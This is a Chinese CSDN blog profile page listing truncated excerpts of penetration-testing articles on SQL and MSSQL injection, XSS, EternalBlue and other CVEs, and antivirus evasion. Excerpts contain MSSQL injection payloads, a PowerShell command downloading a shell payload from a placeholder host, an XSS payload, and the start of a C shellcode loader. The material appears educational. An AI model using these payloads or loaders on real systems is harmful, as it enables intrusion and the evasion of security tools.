自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

春日野穹

基于自身意志的行动才有价值

  • 博客(61)
  • 收藏
  • 关注

原创 博客(blog.m1kh.com)

传送门https://blog.m1kh.com/

2021-04-10 21:17:24 711 1

原创 sql注入---入门到进阶

目录导航sql注入的原理sql注入的条件sql注入的危害sql注入的分类、验证及利用方式sql数值型注入sql注入的原理:概述:针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为,其本质就是对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行,sql注入产生的原理有以下几个方面程序编...

2019-10-24 11:39:50 30631 20

原创 MSSQL注入流程,简洁

MSSQL注入日常使用的payload,遇到MSSQL注入,这些够用了,完整的在这里传送门拿数据的##判断注入点and user>0 --having 1=1-- ##判断权限,如果页面回显正常则为正确,否则报错and 1=(select IS_SRVROLEMEMBER('sysadmin')) --##获取当前数据库And 1=(select db_name()) --##获取当前数据库内的所有数据表and 1=convert(int,(select quotename

2021-02-28 16:00:46 700

原创 MSSQL注入笔记

最近在学习MSSQL注入,以前注入的知识全都忘记了,甚至连MSSQL语句都不认识了,非常尴尬,趁着周末有时间,便重新复习了一下,并写个笔记。写的比较乱,有时间再重新整理一下2021.2.28 15.48.55MSSQL基础知识SQL Server默认库的介绍初始库有4个mastermaster 数据库记录了所有的 SQL Server 数据库系统的系统级信息,如用户帐户,配置设置,并在所有其他数据库信息。 modelmodel 数据库是一个模板数据库。每当创建一个新的数据库(包括系统数据

2021-02-28 15:57:00 878

原创 C实现分离免杀

前期准备1.编译好mian.exe,源码如下#include <stdio.h>#include <windows.h>int main(int argc,char* argv[]){ //打开要执行的ShellCode文件 HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile==INVALID_HANDLE_VALUE)

2021-02-28 15:40:43 2272

原创 powershell渗透常用命令

powershell渗透常用命令set-ExecutionPolicy RemoteSigned //开启执行策略set-ExecutionPolicy Restricted //关闭执行策略远程下载文件powershell$h=new-object System.Net.WebClient$h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh')命令行执行ps1文件powe

2021-02-28 15:19:27 1126

原创 Wireshark的一些常用命令

Wireshark的命令太多,做个笔记TCP三次握手协议第一次握手:客户端的应用程序主动打开,并向服务端发出请求报文段。其首部中SYN=1,seq=x。第二次握手:服务器应用被动打开。若同意客户端的请求,则发回确认报文。其首部中:SYN=1,ACK=1,ack=x+1,seq=y。第三次握手:客户端收到确认报文之后,通知上层应用进程已建立,并向服务器发出确认报文。其首部ACK=1,ack=y+1。运算符比较运算符英文写法C语言写法含义eq==等于ne!=不

2021-01-24 15:19:02 4081

原创 关于谷歌浏览器特性的一些xss payload

details 标签details标签用于描述文档或文档某个部分的细节,目前只有 Chrome 支持 details标签">'><details/open/οntοggle=confirm(1)>autofocus属性说明autofocus 属性规定当页面加载时标签内元素应该自动获得焦点onfocus 事件在对象获得焦点时发生结合起来即可达到弹窗效果在chrome中autofocus可以与所有HTML标签一起使用,可以利用autofocus属性进行自定义标签&lt

2021-01-24 15:14:23 1873 1

原创 关于MySQL注入点的问题

order by后注入注入点在 order by后面,order by 后面不能带union select,此处可以利用报错信息进行注入order by后不能参数化,不只order by,凡是字符串但又不能加引号的位置都不能参数化;包括sql关键字、库名表名字段名函数名等等,否则就会产生了语法错误order by后不能参数化,可关注orderby、sort参数desc或者asc(升序or降序排列)显示结果不同,则表明可以注入mysql> select * from users order b

2021-01-24 14:58:41 298

原创 关于命令行代理流量的问题

Windows注:以下代理仅作用于当前命令行!HTTP 代理设置:set http_proxy=http://127.0.0.1:10809 http访问设置set https_proxy=http://127.0.0.1:10809 https访问设置,一般两个选项代理都开启,例如开启http_proxy,但是命令行访问https站点还是原IPsocks 代理设置:set http_proxy=socks5://127.0.0.1:10808set https_proxy=so

2021-01-24 14:43:55 5832

原创 Powershell 过火绒免杀上线

引言拿到一台位于阿里云主机的shell,为IIS权限需要上线cs提权,主机自带阿里云盾和Windows Defender、且安装了火绒,为方便后续操作,需要进一步提权。powershell免杀制作payload生成原生payload生成后被无情秒杀powershell免杀制作打开powershell命令行,将payload编码1.新建一个变量h,用来接收之后编码的payload$h= ''2.把FromBase64String放入变量$k中$k=[System.Convert]

2021-01-10 17:06:53 5115

原创 awk制作Basic_Auth登录认证字典

引言~我们在渗透的时候,会经常遇到Basic_Auth登录认证(如下图),面对Basic_Auth,我们一般会利用burp进行暴力破解,但Basic_Auth认证字段并非常见格式,常规字典无法进行爆破,这时候我们可以利用Linux下的awk工具改造爆破字典,当然,burp也提供了Basic_Auth登录爆破,但burp提供的Basic_Auth爆破功能用起来总觉得不舒服,故有了下文关于Basic_Auth登录认证可参看:https://blog.csdn.net/chest_/article/deta

2020-11-21 20:17:04 429 2

原创 Druid未授权访问利用

引言~最近外网打点遇到个Druid未授权访问漏洞,觉得过程比较有趣,所以简单记录一下Druid简介druid是阿里研发的一款数据库连接池,其开发语言为java,druid集合了c3p0、dbcp、proxool等连接池的优点,还加入了日志监控、session监控等数据监控功能,使用Druid能有效的监控DB池连接和SQL的执行情况。更多信息可参考官方GitHub项目:https://github.com/alibaba/druiddruid虽高效好用,但当开发者配置不当时就可能造成未授权访问,攻

2020-11-14 21:32:39 19968

原创 雷电模拟器+Proxifier+burp绕过APP抓包检测

引言~最近来了一批APP(有22个),在测试时发现这些APP对抓包代理行为进行检测,无法正常抓包,Xposed也无法解决,故有了下文环境要求burp 任意版本v2ray 任意版本Proxifier 任意版本雷电模拟器 任意版本流量走向大致如下,因为APP是在本地检测抓包行为的,那么我们利用Proxifier在模拟器外进行抓包即可解决~burp 规则配置正常配置抓包端口即可Proxifier 规则配置打开Proxifier,选择Profile --> Proxy Se

2020-11-14 19:49:14 17149 2

原创 Nginx配置Basic_Auth登录认证

前言~闲来无事查看日志,发现新搬家的web服务器频繁遭到僵尸网络的扫描,虽然web服务加固的还不错,但是框架组件出现了新的nday,而自己又没及时留意到漏洞的存在去修补,那么服务器成为肉鸡的风险就增大了;一般来说,僵尸网络的扫描行为都是全互联网大范围进行的,并且所探测的漏洞大多都是一些新爆发的cms漏洞(ThinkPHP)、或者是一些常见的框架组件漏洞(如Struts2),针对该特性,我们可以配置Basic Auth登录认证(ngx_http_auth_basic_module),来减少僵尸网络对我们we

2020-08-29 23:22:40 12545

原创 记录一次自己的小VPS应急

引言~今天登上去我的小vps修改一下CS配置,登录之后感觉vps异常的卡顿,第一时间使用top确认服务器是不是中了挖矿,简单排查后并未发现有挖矿的存在,随后习惯性的使用lastb查看服务器是否存在异常登录事件;回车后一看,发现俺的小vps惨遭爆破,爆破失败次数高达18w次!并且就在我登录成功之后,仍旧有爆破的日志在产生,之前天天过去甲方应急,现在终于轮到自己了~~身为一名安全从业者,立马展开对vps的安全检查,一顿操作过后,并未发现服务器受到实质性的危害,但目前爆破的动作还在,由于是廉价vps,这样不要

2020-06-26 00:41:40 1318 1

原创 远程桌面代码执行漏洞复现(CVE-2019-0708)

目录导航一. 漏洞范围二. 漏洞探测三. 漏洞利用四. 修复建议CVE-2019-0708 漏洞影响范围:Windows 7(已停止维护)Windows Server 2008 R2Windows Server 2008 WindowsServer 2003(已停止维护)Windows XP(已停止维护)漏洞复现环境:ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C

2020-06-24 17:53:11 1156 4

原创 Linux误解压的后悔药

前言~linux手贱解压的后悔药手贱解压导致目录多了一大堆乱七八糟的文件,需要撤销~unzip误解压使用以下命令补救:zipinfo -1 ./ShareWAF.zip(误解压文件) | xargs rm -rf如果是tar误解则压使用以下命令补救:tar -tf 误解压文件 | xargs rm -rftar -tf 是列出该压缩文件中的文件列表,xargs rm -rf 则是根据前面的文件列表来删除文件...

2020-06-01 10:25:25 3779 3

原创 应急响应篇 --自动化查杀Linux后门及Rootkit

0x0引言~当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽或减少经济损失,本篇主要概述两款基于linux下病毒查杀的工具(河马、chkrootkit)文章目录河马 webshell扫描器下载传送门安装过程实战演示chkrootkit下载传送门安装过程实战演示河马 webshell扫描器1.下载

2020-05-26 12:57:43 1833

原创 linux练习平台WarGame之bandit通关日志

前言~Bandit是一个学习linux命令的闯关游戏平台,比较类似于ctf,通过闯关的模式,不断的学习新的命令,对于程序员亦或者安全爱好者来说都是一个不错的学习平台传送门根据给出的提示信息,使用xshell登录或者linux直接远程连接ssh登录SSH信息主机:bandit.labs.overthewire.org端口:2220开始闯关Level 0 → Leve...

2020-05-06 11:45:14 3703 4

原创 Windows下文件哈希值效验

0x0引言~当我们下载了文件,想要校验文件的完整性,这时可以直接使用windows自带的certutil命令就可以校验文件的哈希值,就不用再下载校验文件工具命令格式:certutil -hashfile <文件名> <hash类型>注:certutil命令支持的哈希值算法有MD2,MD4,MD5,SHA1,SHA256,SHA384,SHA512得出哈希值后,...

2020-05-06 10:50:14 872

原创 Memcache未授权访问漏洞利用及修复

0x0引言~Memcache是​​临时数据存储服务,以:格式存储数据,通过将数据块存储在缓存中,可以提高网站的整体性能,这些数据通常是应用读取频繁的。正因为内存中数据的读取远远大于硬盘,因此可以用来加速应用的访问。但由于memcached安全设计缺陷,默认的 11211 端口不需要密码即可访问,导致攻击者可直接链接memcache服务的11211端口获取数据库中信息,这可造成严重的信息泄露...

2020-04-28 11:24:29 12980

原创 解决Oracle11g 64位安装过程中遇到的问题

目录导航环境不满足错误无法加载安装图形界面测试安装小结一、环境不满足错误运行安装后出现环境不满足最低要求的警告,如下:因为cvu_prereq.xml文件没有记录win10的环境所以会报错,这时候我们找到cvu_prereq.xml文件打开查看;可以看到,该xml文件记录各种操作系统版本运行环境,但唯独缺少了win10的环境说明,这时候我们手动添加即可cvu_prereq....

2020-04-15 11:55:37 2202

原创 心脏出血漏洞利用

0x0引言~心脏出血(英语:Heartbleed),也简称为心血漏洞,是一个出现在加密程序库OpenSSL的安全漏洞,该程序库广泛用于实现互联网的传输层安全(TLS)协议。它于2012年被引入了软件中,2014年4月首次向公众披露。只要使用的是存在缺陷的OpenSSL实例,无论是服务器还是客户端,都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证(缺少边界检查),...

2020-04-09 15:25:53 3259 2

原创 解决默认浏览器被劫持

计算机\HKEY_CLASSES_ROOT\http\shell\open\command“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” %1

2020-04-06 00:16:23 1527

原创 解决docker-compose命令运行报错

报错信息:ERROR: Couldn't connect to Docker daemon at http+docker://localhost - is it running?If it's at a non-standard location, specify the URL with the DOCKER_HOST environment variable.解决方法:1.命令行...

2020-02-17 14:50:41 4493

原创 kali 2019版安装中文输入法

安装前不建议换源,官方源的速度足够了!!话不多说,下面是安装步骤1.Ctrl+alt+t 调出命令行,接着输入:apt install ibus ibus-pinyin因为我已经装完了,所以会出现上面情况,第一次装输入命令后根据提示按y回车即可2.完成上面步骤后,再往命令行处输入:ibus-setup调出输入法设置可根据自己使用输入法的习惯设置符合自己的快捷键最后一步:re...

2020-01-30 15:31:23 775

原创 解决 nmap扫描时报错 “ppp0“ is not an ethernet device

报错原因:使用拨号上网,协议 使用的是ppp,nmap不识别解决方法:加上 -sT -Pn 两个参数即可拨号上网使用PPP拨号协议来代替MAC二层协议,由于nmap版本不知道ppp协议的二层协议,所以会报以下错误又或者用手机WiFi网络进行扫描则会报以下问题加上-sT 和 -Pn 参数后完美解决...

2020-01-13 21:23:45 3092 1

原创 浅谈Web登录认证类漏洞

0x0 前言做渗透测试也有一段时间了,每次对目标站点进行渗透的时候都发现登录方面的问题特别多,针对Web登录认证这块,我一直想要写个帖子进行全面点的总结,耐于目前处于实习阶段,工作也较多,所以推迟到了如今,话不多说,下面开始进行对Web登录认证类漏洞的安全验证设计机制进行探讨。目录导航一.web登录认证的功能划分1.用户登录2.用户注册3.密码找回4.验证码1.图片验证码2...

2020-01-12 00:48:31 6517 2

原创 永恒之蓝 MS17-010漏洞复现

目录导航一. 复现环境二. 漏洞原理1.漏洞简介2.漏洞原理代码详解三. 漏洞复现1.信息收集2.漏洞探测3.漏洞利用一. 复现环境工具:msf攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...

2019-12-21 18:02:58 1206

原创 sqli-labs 通关日志 萌新向

0x0 引言sqli-labs是一个用来练习sql注入的平台,其内置集成了现存的各种sql注入,如盲注,联合查询注入等,对于新手来说它是一个十分不错的练习平台,我们可以使用它来进行各种注入尝试,从而提升我们的sql注入能力萌新建议先看这个帖子再来做题:https://blog.csdn.net/chest_/article/details/102537988目录快速导航环境的搭...

2019-11-16 20:31:55 1693

原创 CVE-2018-20250 -- WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线

0x0 引言Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞,被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件,该文件自 2005 年发布至今就从未有过更新过,影响时长长达十余年之久实验介绍利用cve-2018-20250结合ngrok(公网安装的msf无须ngrok),穿透内网实验环...

2019-11-13 22:42:24 795

原创 解决win10拨号连接下无法开启热点

0x0 引言最近由于工作原因搬了个新宿舍,到了新宿舍之后,我发现这里的网络连接所采用的是宽带拨号模式,也就是一人一个小账号上网,用各自一个宽带账号上网,能在上网高峰期保持网速的稳定,虽然宽带拨号的上网模式能够更加安全且稳定,但是在该拨号模式下,如果我们没有随身携带路由器,那么此时的win10是无法正常的开启自带的热点功能的,如果此时我们想连链接热点刷刷抖音,打打游戏,那么就没戏了,有人可能会问,...

2019-11-11 21:14:21 31007 39

原创 渗透测试系统 Parrot Security 入门使用

引言~Parrot Security OS是一个完整的多合一的渗透测试环境,它基于Debian的GUN/Linux发行版Parrot Security,利用Parrot Security OS,我们可进行笔测,隐私,数字取证,反向工程和软件开发,因其完整的渗透测试工具库和漂亮的UI而出名。导航条Parrot 系统的安装入门使用 镜像下载镜像源的配置 新建虚拟机...

2019-11-03 00:20:18 9277 2

原创 linux中sort和uniq命令

0x1 sort命令命令说明:sort命令将文本文件内容加以排序,sort可针对文本文件的内容,以行为单位来排序参数:-b 忽略每行前面开始出的空格字符。-c 检查文件是否已经按照顺序排序。-d 排序时,处理英文字母、数字及空格字符外,忽略其他的字符。-f 排序时,将小写字母视为大写字母。-i 排序时,除了040至176之间的ASCII字符外,忽略其他的字符。...

2019-10-25 10:50:08 4926

原创 管道符丨用法

在 Bash 中,管道符使用"丨"代表。管道符也是用来连接多条命令的,如"命令1丨命令2"。不过和多命令顺序执行不同的是,用管道符连接的命令,命令 1 的正确输出作为命令 2 的操作对象。这里需要注意,命令 1 必须有正确输出,而命令 2 必须可以处理命令 1 的输出结果;而且命令 2 只能处理命令 1 的正确输出,而不能处理错误输出。最常用的就是配合grep来使用:ps -ef|grep ...

2019-10-25 10:03:18 2900

原创 LINUX命令后面常见的>/dev/null 解释

Linux中的标准输入输出0 是标准输入,一般是从键盘获得输入1 是标准输出,一般是输出到屏幕了2 是标准错误,有时候屏幕上可以看到,但是重定向的文件中看不到的就是它了>为重定向符号>/dev/null 是一个特殊的设备文件,这个文件接收到任何数据都会被丢弃,俗称“黑洞”2>/dev/null意思就是把错误输出到“黑洞” ,也就是说如果你的命令出错...

2019-10-24 17:26:27 21767 1

原创 CVE-2019-14287 sudo权限绕过漏洞复现

0x1 引言近日 ,sudo 被爆光一个漏洞,非授权的特权用户可以绕过限制获得特权,也就是说如果将sudo配置为允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令的话,那么攻击者将有可能通过制定用户ID -1或4294967295来以root权限执行恶意命令,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。官方的修复公告请见:https://www...

2019-10-24 11:16:15 1778 1

原创 反序列化漏洞CVE-2017-10271复现

0x1 漏洞详情Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性0x2 漏洞检测通过常用的反序列化工具检测可以发现...

2019-10-23 12:45:41 1758

原创 XXE漏洞复现

引言~XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。实验环境~PHP版本:5.4.45中间件:apache复现平台:皮卡丘漏洞练习平台libXML编译版本:2.7.8 libxm...

2019-10-23 12:33:16 2873

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除